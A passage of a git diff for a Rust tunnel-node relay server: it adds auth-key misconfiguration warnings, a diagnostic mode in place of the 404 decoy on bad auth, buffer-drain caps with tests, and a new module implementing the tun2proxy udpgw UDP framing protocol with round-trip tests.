Several old + // copy-paste guides used `MHRV_AUTH_KEY` for the docker run; tunnel-node + // never read that name and silently fell through to `changeme`, + // producing baffling AUTH_KEY-mismatch decoys on the client. If + // `MHRV_AUTH_KEY` is set, point at it specifically so the user sees + // why their value isn't taking effect. + if std::env::var("MHRV_AUTH_KEY").is_ok() { + tracing::warn!( + "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — \ + tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with \ + underscores). Rename your env var: \ + `docker run ... -e TUNNEL_AUTH_KEY=`. Falling \ + back to default `changeme` for now (INSECURE — clients will \ + fail with AUTH_KEY mismatch decoys until this is fixed)." + ); + } else { + tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)"); + } "changeme".into() }); let port: u16 = std::env::var("PORT") @@ -1248,7 +1436,20 @@ async fn main() { Arc::new(Mutex::new(HashMap::new())); tokio::spawn(cleanup_task(sessions.clone(), udp_sessions.clone())); - let state = AppState { sessions, udp_sessions, auth_key }; + // MHRV_DIAGNOSTIC=1 in env restores verbose JSON error responses on + // bad auth (instead of the nginx-404 decoy). Use during setup so + // misconfigured clients see "unauthorized"; flip back off in prod. + let diagnostic_mode = std::env::var("MHRV_DIAGNOSTIC") + .map(|v| v == "1" || v.eq_ignore_ascii_case("true")) + .unwrap_or(false); + if diagnostic_mode { + tracing::warn!( + "MHRV_DIAGNOSTIC=1 — bad-auth responses are verbose JSON \ + errors instead of the production nginx-404 decoy. Disable \ + before exposing this tunnel-node to the public internet." 
+ ); + } + let state = AppState { sessions, udp_sessions, auth_key, diagnostic_mode }; let app = Router::new() .route("/tunnel", post(handle_tunnel)) @@ -1283,6 +1484,10 @@ mod tests { sessions: Arc::new(Mutex::new(HashMap::new())), udp_sessions: Arc::new(Mutex::new(HashMap::new())), auth_key: "test-key".into(), + // Tests assert against the JSON `unauthorized` body shape + // (see e.g. `bad_auth_returns_unauthorized`), so they need + // diagnostic_mode enabled. Production default is false. + diagnostic_mode: true, } } @@ -1430,7 +1635,7 @@ mod tests { let (_reader, writer) = client.into_split(); Arc::new(SessionInner { - writer: Mutex::new(writer), + writer: Mutex::new(SessionWriter::Tcp(writer)), read_buf: Mutex::new(Vec::new()), eof: AtomicBool::new(false), last_active: Mutex::new(Instant::now()), @@ -1438,6 +1643,61 @@ mod tests { }) } + #[tokio::test] + async fn drain_now_caps_at_tcp_drain_max_bytes() { + // Issue #460: a 1 Gbps VPS reader fills the buffer with tens of MiB + // between polls; drain_now used to take the lot, the JSON response + // exceeded Apps Script's body cap, and the client failed JSON parse. + // The cap leaves the tail in the buffer for the next drain. + let inner = fake_inner().await; + let oversized = TCP_DRAIN_MAX_BYTES + 4096; + inner.read_buf.lock().await.resize(oversized, 0xab); + + let (first, eof) = drain_now(&inner).await; + assert_eq!(first.len(), TCP_DRAIN_MAX_BYTES); + assert!(!eof, "shouldn't propagate eof while buffer still has data"); + + // Tail remains for the next poll. 
+ assert_eq!(inner.read_buf.lock().await.len(), 4096); + + let (second, _) = drain_now(&inner).await; + assert_eq!(second.len(), 4096); + assert!(inner.read_buf.lock().await.is_empty()); + } + + #[tokio::test] + async fn drain_now_passes_through_when_under_cap() { + let inner = fake_inner().await; + inner.read_buf.lock().await.extend_from_slice(b"hello world"); + + let (data, eof) = drain_now(&inner).await; + assert_eq!(data, b"hello world"); + assert!(!eof); + assert!(inner.read_buf.lock().await.is_empty()); + } + + #[tokio::test] + async fn drain_now_holds_eof_until_buffer_drained() { + // If upstream signals EOF while the buffer is still oversized, we + // must drain the head, leave the tail, and *not* set eof yet. + // Eof flips on the final drain that returns a sub-cap buffer. + let inner = fake_inner().await; + inner.eof.store(true, Ordering::Release); + inner + .read_buf + .lock() + .await + .resize(TCP_DRAIN_MAX_BYTES + 100, 0); + + let (head, head_eof) = drain_now(&inner).await; + assert_eq!(head.len(), TCP_DRAIN_MAX_BYTES); + assert!(!head_eof, "premature eof would tear the session"); + + let (tail, tail_eof) = drain_now(&inner).await; + assert_eq!(tail.len(), 100); + assert!(tail_eof, "eof finally flips when buffer is drained"); + } + #[tokio::test] async fn wait_for_any_drainable_returns_immediately_when_buffer_has_data() { let inner = fake_inner().await; @@ -1597,7 +1857,7 @@ mod tests { let stream = TcpStream::connect(addr).await.unwrap(); let (reader, writer) = stream.into_split(); let inner = Arc::new(SessionInner { - writer: Mutex::new(writer), + writer: Mutex::new(SessionWriter::Tcp(writer)), read_buf: Mutex::new(Vec::new()), eof: AtomicBool::new(false), last_active: Mutex::new(Instant::now()), diff --git a/tunnel-node/src/udpgw.rs b/tunnel-node/src/udpgw.rs new file mode 100644 index 00000000..3c6e1800 --- /dev/null +++ b/tunnel-node/src/udpgw.rs @@ -0,0 +1,512 @@ +//! Native implementation of the tun2proxy udpgw wire protocol. +//! +//! 
Wire format (all fields big-endian): +//! ```text +//! +-----+-------+---------+------+----------+----------+----------+ +//! | LEN | FLAGS | CONN_ID | ATYP | DST.ADDR | DST.PORT | DATA | +//! +-----+-------+---------+------+----------+----------+----------+ +//! | 2 | 1 | 2 | 1 | Variable | 2 | Variable | +//! +-----+-------+---------+------+----------+----------+----------+ +//! ``` +//! +//! Flags: KEEPALIVE=0x01, DATA=0x02, ERR=0x20 +//! ATYP: 0x01=IPv4(4B), 0x03=Domain(1B len + name), 0x04=IPv6(16B) + +use std::net::{Ipv4Addr, Ipv6Addr, SocketAddr, SocketAddrV4, SocketAddrV6}; +use std::sync::Arc; + +use tokio::io::{AsyncReadExt, AsyncWriteExt, DuplexStream}; +use tokio::net::UdpSocket; + +/// Magic address that the client connects to via the tunnel protocol. +/// `198.18.0.0/15` is reserved for benchmarking (RFC 2544) and will +/// never be a real destination. +pub const UDPGW_MAGIC_IP: [u8; 4] = [198, 18, 0, 1]; +pub const UDPGW_MAGIC_PORT: u16 = 7300; + +const FLAG_KEEPALIVE: u8 = 0x01; +const FLAG_DATA: u8 = 0x02; +const FLAG_ERR: u8 = 0x20; + +const ATYP_IPV4: u8 = 0x01; +const ATYP_DOMAIN: u8 = 0x03; +const ATYP_IPV6: u8 = 0x04; + +/// Maximum UDP payload we'll handle. +const UDP_MTU: usize = 10240; + +// ------------------------------------------------------------------------- +// Frame types +// ------------------------------------------------------------------------- + +#[derive(Debug, Clone)] +enum DstAddr { + V4(Ipv4Addr, u16), + V6(Ipv6Addr, u16), + Domain(String, u16), +} + +impl DstAddr { + fn to_socket_addr(&self) -> std::io::Result { + match self { + DstAddr::V4(ip, port) => Ok(SocketAddr::V4(SocketAddrV4::new(*ip, *port))), + DstAddr::V6(ip, port) => Ok(SocketAddr::V6(SocketAddrV6::new(*ip, *port, 0, 0))), + DstAddr::Domain(name, port) => { + use std::net::ToSocketAddrs; + (name.as_str(), *port) + .to_socket_addrs()? 
+ .next() + .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::AddrNotAvailable, "DNS resolution failed")) + } + } + } + + /// Serialise into SOCKS5 address format: ATYP + addr + port. + fn write_to(&self, buf: &mut Vec) { + match self { + DstAddr::V4(ip, port) => { + buf.push(ATYP_IPV4); + buf.extend_from_slice(&ip.octets()); + buf.extend_from_slice(&port.to_be_bytes()); + } + DstAddr::V6(ip, port) => { + buf.push(ATYP_IPV6); + buf.extend_from_slice(&ip.octets()); + buf.extend_from_slice(&port.to_be_bytes()); + } + DstAddr::Domain(name, port) => { + buf.push(ATYP_DOMAIN); + buf.push(name.len() as u8); + buf.extend_from_slice(name.as_bytes()); + buf.extend_from_slice(&port.to_be_bytes()); + } + } + } + + fn serialised_len(&self) -> usize { + match self { + DstAddr::V4(..) => 1 + 4 + 2, // ATYP + IPv4 + port + DstAddr::V6(..) => 1 + 16 + 2, // ATYP + IPv6 + port + DstAddr::Domain(n, _) => 1 + 1 + n.len() + 2, // ATYP + len + name + port + } + } +} + +#[derive(Debug)] +struct Frame { + flags: u8, + conn_id: u16, + addr: Option, + payload: Vec, +} + +// ------------------------------------------------------------------------- +// Parse / serialise +// ------------------------------------------------------------------------- + +/// Try to parse one frame from `buf`. Returns `(frame, bytes_consumed)` or +/// `None` if the buffer doesn't contain a complete frame yet. +fn try_parse_frame(buf: &[u8]) -> Result, std::io::Error> { + if buf.len() < 2 { + return Ok(None); + } + let body_len = u16::from_be_bytes([buf[0], buf[1]]) as usize; + let total = 2 + body_len; + if buf.len() < total { + return Ok(None); + } + + let body = &buf[2..total]; + if body.len() < 3 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "frame too short")); + } + let flags = body[0]; + let conn_id = u16::from_be_bytes([body[1], body[2]]); + let rest = &body[3..]; + + let (addr, payload_start) = if flags & FLAG_DATA != 0 { + // Parse SOCKS5-style address. 
+ if rest.is_empty() { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "missing ATYP")); + } + let atyp = rest[0]; + match atyp { + ATYP_IPV4 => { + if rest.len() < 1 + 4 + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv4 addr")); + } + let ip = Ipv4Addr::new(rest[1], rest[2], rest[3], rest[4]); + let port = u16::from_be_bytes([rest[5], rest[6]]); + (Some(DstAddr::V4(ip, port)), 7) + } + ATYP_IPV6 => { + if rest.len() < 1 + 16 + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv6 addr")); + } + let mut octets = [0u8; 16]; + octets.copy_from_slice(&rest[1..17]); + let ip = Ipv6Addr::from(octets); + let port = u16::from_be_bytes([rest[17], rest[18]]); + (Some(DstAddr::V6(ip, port)), 19) + } + ATYP_DOMAIN => { + if rest.len() < 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr")); + } + let dlen = rest[1] as usize; + if rest.len() < 2 + dlen + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr")); + } + let name = String::from_utf8_lossy(&rest[2..2 + dlen]).into_owned(); + let port = u16::from_be_bytes([rest[2 + dlen], rest[3 + dlen]]); + (Some(DstAddr::Domain(name, port)), 2 + dlen + 2) + } + _ => { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, format!("unknown ATYP 0x{:02x}", atyp))); + } + } + } else { + (None, 0) + }; + + let payload = rest[payload_start..].to_vec(); + + Ok(Some((Frame { flags, conn_id, addr, payload }, total))) +} + +fn serialise_frame(frame: &Frame) -> Vec { + // Body = flags(1) + conn_id(2) + [addr] + payload + let addr_len = frame.addr.as_ref().map_or(0, |a| a.serialised_len()); + let body_len = 1 + 2 + addr_len + frame.payload.len(); + + let mut buf = Vec::with_capacity(2 + body_len); + buf.extend_from_slice(&(body_len as u16).to_be_bytes()); + buf.push(frame.flags); + buf.extend_from_slice(&frame.conn_id.to_be_bytes()); + if let Some(ref addr) = frame.addr { + 
addr.write_to(&mut buf); + } + buf.extend_from_slice(&frame.payload); + buf +} + +// ------------------------------------------------------------------------- +// Public API +// ------------------------------------------------------------------------- + +/// Returns `true` if the connect destination is the magic udpgw address. +pub fn is_udpgw_dest(host: &str, port: u16) -> bool { + port == UDPGW_MAGIC_PORT && host == format!("{}.{}.{}.{}", UDPGW_MAGIC_IP[0], UDPGW_MAGIC_IP[1], UDPGW_MAGIC_IP[2], UDPGW_MAGIC_IP[3]) +} + +/// Per-conn_id persistent UDP socket with a background reader that +/// continuously receives datagrams and queues response frames. +struct ConnSocket { + sock: Arc, + _reader: tokio::task::AbortHandle, +} + +/// Run the udpgw server over a duplex stream. Reads udpgw frames from the +/// client half, sends real UDP datagrams, and writes response frames back. +/// Maintains persistent sockets per conn_id so Telegram VoIP (which expects +/// a stable source port) works correctly. +pub async fn udpgw_server_task(stream: DuplexStream) { + let (tx, mut rx) = tokio::sync::mpsc::channel::>(256); + + // Writer task: drains response channel → duplex stream. + let mut read_half = { + let (read_half, write_half) = tokio::io::split(stream); + tokio::spawn(async move { + let mut w = write_half; + while let Some(data) = rx.recv().await { + if w.write_all(&data).await.is_err() { + break; + } + let _ = w.flush().await; + } + }); + read_half + }; + + // Persistent sockets keyed by (conn_id, dest_addr). 
+ let mut sockets: std::collections::HashMap<(u16, SocketAddr), ConnSocket> = std::collections::HashMap::new(); + + let mut buf = Vec::with_capacity(65536); + let mut tmp = [0u8; 65536]; + + loop { + let n = match read_half.read(&mut tmp).await { + Ok(0) | Err(_) => break, + Ok(n) => n, + }; + buf.extend_from_slice(&tmp[..n]); + + loop { + match try_parse_frame(&buf) { + Ok(Some((frame, consumed))) => { + buf.drain(..consumed); + handle_frame(&frame, &tx, &mut sockets).await; + } + Ok(None) => break, + Err(e) => { + tracing::warn!("udpgw frame parse error: {}", e); + if buf.len() >= 2 { + let skip = 2 + u16::from_be_bytes([buf[0], buf[1]]) as usize; + buf.drain(..skip.min(buf.len())); + } else { + buf.clear(); + } + break; + } + } + } + } + + // AbortHandle::drop aborts each reader task automatically. + drop(sockets); + tracing::debug!("udpgw session ended"); +} + +/// Get or create a persistent UDP socket for this (conn_id, dest_addr) pair. +/// A background reader task continuously receives datagrams and queues +/// response frames — no per-packet timeout needed. +async fn get_or_create_socket( + conn_id: u16, + dst: &SocketAddr, + addr: &DstAddr, + tx: &tokio::sync::mpsc::Sender>, + sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>, +) -> Option> { + let key = (conn_id, *dst); + if let Some(cs) = sockets.get(&key) { + return Some(cs.sock.clone()); + } + + let bind_addr: SocketAddr = if dst.is_ipv6() { + "[::]:0".parse().unwrap() + } else { + "0.0.0.0:0".parse().unwrap() + }; + let sock = match UdpSocket::bind(bind_addr).await { + Ok(s) => Arc::new(s), + Err(e) => { + tracing::debug!("udpgw bind failed: {}", e); + return None; + } + }; + if let Err(e) = sock.connect(dst).await { + tracing::debug!("udpgw connect {} failed: {}", dst, e); + return None; + } + + // Spawn continuous reader for this socket. 
+ let sock_clone = sock.clone(); + let tx_clone = tx.clone(); + let addr_clone = addr.clone(); + let reader = tokio::spawn(async move { + let mut recv_buf = vec![0u8; UDP_MTU]; + loop { + match sock_clone.recv(&mut recv_buf).await { + Ok(n) => { + let resp = serialise_frame(&Frame { + flags: FLAG_DATA, + conn_id, + addr: Some(addr_clone.clone()), + payload: recv_buf[..n].to_vec(), + }); + if tx_clone.send(resp).await.is_err() { + break; + } + } + Err(_) => break, + } + } + }); + + sockets.insert(key, ConnSocket { sock: sock.clone(), _reader: reader.abort_handle() }); + Some(sock) +} + +async fn handle_frame( + frame: &Frame, + tx: &tokio::sync::mpsc::Sender>, + sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>, +) { + if frame.flags & FLAG_KEEPALIVE != 0 { + let resp = serialise_frame(&Frame { + flags: FLAG_KEEPALIVE, + conn_id: frame.conn_id, + addr: None, + payload: vec![], + }); + let _ = tx.send(resp).await; + return; + } + + if frame.flags & FLAG_DATA == 0 { + return; + } + + let Some(ref dst) = frame.addr else { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + }; + + // Block QUIC (UDP 443) and DNS (UDP 53) from udpgw: + // - QUIC: forces browsers to fall back to TCP/HTTP2 which is much + // faster through the batch tunnel pipeline. + // - DNS: let tun2proxy's virtual DNS / SOCKS5 UDP associate handle + // it instead — more reliable on the per-session path. + // VoIP (Telegram, Meet) still flows through udpgw normally. 
+ let dst_port = match dst { + DstAddr::V4(_, p) | DstAddr::V6(_, p) | DstAddr::Domain(_, p) => *p, + }; + if dst_port == 443 || dst_port == 53 { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + } + + let dst_addr = match dst.to_socket_addr() { + Ok(a) => a, + Err(e) => { + tracing::debug!("udpgw resolve failed: {}", e); + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + } + }; + + let Some(sock) = get_or_create_socket(frame.conn_id, &dst_addr, dst, tx, sockets).await else { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + }; + + // Send the datagram. Response comes asynchronously via the reader task. + if let Err(e) = sock.send(&frame.payload).await { + tracing::debug!("udpgw send to {} failed: {}", dst_addr, e); + let _ = tx.send(serialise_err(frame.conn_id)).await; + } +} + +fn serialise_err(conn_id: u16) -> Vec { + serialise_frame(&Frame { + flags: FLAG_ERR, + conn_id, + addr: None, + payload: vec![], + }) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn keepalive_round_trip() { + let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 42, addr: None, payload: vec![] }; + let bytes = serialise_frame(&frame); + let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(consumed, bytes.len()); + assert_eq!(parsed.flags, FLAG_KEEPALIVE); + assert_eq!(parsed.conn_id, 42); + assert!(parsed.addr.is_none()); + assert!(parsed.payload.is_empty()); + } + + #[test] + fn data_ipv4_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 7, + addr: Some(DstAddr::V4(Ipv4Addr::new(8, 8, 8, 8), 53)), + payload: vec![1, 2, 3, 4], + }; + let bytes = serialise_frame(&frame); + let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(consumed, bytes.len()); + assert_eq!(parsed.flags, FLAG_DATA); + assert_eq!(parsed.conn_id, 7); + assert_eq!(parsed.payload, vec![1, 2, 3, 4]); + match parsed.addr.unwrap() { + DstAddr::V4(ip, port) => { + assert_eq!(ip, 
Ipv4Addr::new(8, 8, 8, 8)); + assert_eq!(port, 53); + } + _ => panic!("expected IPv4"), + } + } + + #[test] + fn data_ipv6_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 100, + addr: Some(DstAddr::V6(Ipv6Addr::LOCALHOST, 443)), + payload: b"hello".to_vec(), + }; + let bytes = serialise_frame(&frame); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(parsed.conn_id, 100); + match parsed.addr.unwrap() { + DstAddr::V6(ip, port) => { + assert_eq!(ip, Ipv6Addr::LOCALHOST); + assert_eq!(port, 443); + } + _ => panic!("expected IPv6"), + } + } + + #[test] + fn data_domain_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 5, + addr: Some(DstAddr::Domain("example.com".into(), 80)), + payload: b"GET /".to_vec(), + }; + let bytes = serialise_frame(&frame); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + match parsed.addr.unwrap() { + DstAddr::Domain(name, port) => { + assert_eq!(name, "example.com"); + assert_eq!(port, 80); + } + _ => panic!("expected Domain"), + } + } + + #[test] + fn err_frame_round_trip() { + let bytes = serialise_err(99); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(parsed.flags, FLAG_ERR); + assert_eq!(parsed.conn_id, 99); + } + + #[test] + fn partial_frame_returns_none() { + let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] }; + let bytes = serialise_frame(&frame); + // Give it only half the bytes. 
+ assert!(try_parse_frame(&bytes[..bytes.len() / 2]).unwrap().is_none()); + } + + #[test] + fn two_frames_in_buffer() { + let f1 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] }); + let f2 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 2, addr: None, payload: vec![] }); + let mut buf = f1.clone(); + buf.extend_from_slice(&f2); + + let (p1, c1) = try_parse_frame(&buf).unwrap().unwrap(); + assert_eq!(p1.conn_id, 1); + let (p2, _) = try_parse_frame(&buf[c1..]).unwrap().unwrap(); + assert_eq!(p2.conn_id, 2); + } + + #[test] + fn is_udpgw_dest_works() { + assert!(is_udpgw_dest("198.18.0.1", 7300)); + assert!(!is_udpgw_dest("198.18.0.1", 80)); + assert!(!is_udpgw_dest("8.8.8.8", 7300)); + } +}